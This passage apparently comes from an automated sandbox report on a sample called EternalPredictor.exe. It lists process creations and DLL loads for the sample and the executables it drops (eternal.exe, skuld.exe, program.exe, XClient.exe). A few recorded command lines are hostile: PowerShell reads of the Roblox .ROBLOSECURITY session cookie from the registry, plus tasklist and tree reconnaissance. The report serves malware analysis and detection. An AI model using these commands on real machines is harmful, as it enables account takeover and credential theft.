                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: avicap32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: msvfw32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: python3.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: libffi-8.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: sqlite3.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: libcrypto-3.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: libssl-3.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: avicap32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: msvfw32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: dciman32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: winmmbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: mmdevapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: devobj.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: ksuser.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: avrt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: audioses.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: msacm32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: midimap.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\XClient.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
